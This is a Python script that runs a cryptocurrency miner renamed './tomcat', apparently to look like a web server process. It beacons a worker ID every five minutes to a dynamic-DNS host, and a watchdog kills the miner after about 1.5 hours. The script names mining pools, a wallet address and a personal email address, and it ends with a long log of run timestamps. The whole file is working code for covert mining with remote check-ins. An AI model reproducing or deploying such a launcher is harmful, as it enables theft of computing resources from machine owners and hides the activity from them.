import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:47:07.139345
#2018-02-17 17:35:04.242270
#2018-02-17 19:23:03.426173
#2018-02-17 21:14:01.664598
#2018-02-17 22:58:07.752997
#2018-02-18 00:44:04.127179
#2018-02-18 02:32:05.726265
#2018-02-18 04:19:07.557358
#2018-02-18 06:10:08.846578
#2018-02-18 08:01:05.630057
#2018-02-18 09:49:05.864969
#2018-02-18 11:36:01.606367
#2018-02-18 13:21:06.397750
#2018-02-18 15:11:07.819644
#2018-02-18 16:59:06.688594
#2018-02-18 18:46:07.137887
#2018-02-18 20:34:06.097418
#2018-02-18 22:19:04.202518
#2018-02-19 00:08:02.271312
#2018-02-19 01:54:05.137942
#2018-02-19 03:41:02.093674
#2018-02-19 05:25:08.223530
#2018-02-19 07:12:06.350988
#2018-02-19 09:01:05.757120
#2018-02-19 10:49:03.859167
#2018-02-19 12:37:07.491020
#2018-02-19 14:24:06.964906
#2018-02-19 16:14:04.301980
#2018-02-19 18:02:09.225987
#2018-02-19 19:48:06.972659
#2018-02-19 21:35:06.040804
#2018-02-19 23:23:07.573377
#2018-02-20 01:09:05.019281
#2018-02-20 02:58:05.704519
#2018-02-20 04:46:04.171484
#2018-02-20 06:30:08.131578
#2018-02-20 08:15:06.927133
#2018-02-20 10:01:03.879164
#2018-02-20 11:45:08.795825
#2018-02-20 13:34:05.280951
#2018-02-20 15:17:05.651132
#2018-02-20 17:02:06.996304
#2018-02-20 18:50:07.389179
#2018-02-20 20:37:07.467357
#2018-02-20 22:21:07.129714
#2018-02-21 00:02:02.193032
#2018-02-21 01:47:03.871037
#2018-02-21 03:35:06.112359
#2018-02-21 05:24:07.188918
#2018-02-21 07:11:06.568098
#2018-02-21 08:58:04.621217
#2018-02-21 10:46:04.584144
#2018-02-21 12:32:06.928756
#2018-02-21 14:19:04.190283
#2018-02-21 16:07:10.152298
#2018-02-21 17:57:05.746907
#2018-02-21 19:43:01.720457
#2018-02-21 21:31:01.785183
#2018-02-21 23:16:06.797944
#2018-02-22 01:06:01.700663
#2018-02-22 02:53:01.849394
#2018-02-22 04:39:06.843459
#2018-02-22 06:25:03.723152
#2018-02-22 08:12:06.456235
#2018-02-22 10:01:09.208033
#2018-02-22 11:45:08.151353
#2018-02-22 13:32:02.069032
#2018-02-22 15:20:04.148216
#2018-02-22 17:05:07.994184
#2018-02-22 18:52:07.676269
#2018-02-22 20:46:07.018170
#2018-02-22 22:31:07.287949
#2018-02-23 00:18:07.474633
#2018-02-23 02:07:06.487623
#2018-02-23 03:55:06.615609
#2018-02-23 05:39:04.310672
#2018-02-23 07:24:05.924862
#2018-02-23 09:28:08.533886
#2018-02-23 11:33:09.927813
#2018-02-23 13:24:01.762878
#2018-02-23 15:09:07.919023
#2018-02-23 16:58:04.797083
#2018-02-23 19:06:06.986832
#2018-02-23 20:51:06.011039
#2018-02-23 22:38:06.623211
#2018-02-24 00:24:04.619994
#2018-02-24 02:16:05.704668
#2018-02-24 04:05:04.228900
#2018-02-24 05:49:05.783352
#2018-02-24 07:34:07.645743
#2018-02-24 09:21:04.439347
#2018-02-24 11:15:04.259680
#2018-02-24 13:04:01.768234
#2018-02-24 14:52:04.210631
#2018-02-24 16:43:06.951885
#2018-02-24 18:32:05.667455
#2018-02-24 20:18:01.518627
#2018-02-24 22:11:04.186144
#2018-02-25 01:09:03.709569
#2018-02-25 04:46:06.077555
#2018-02-25 09:01:01.220404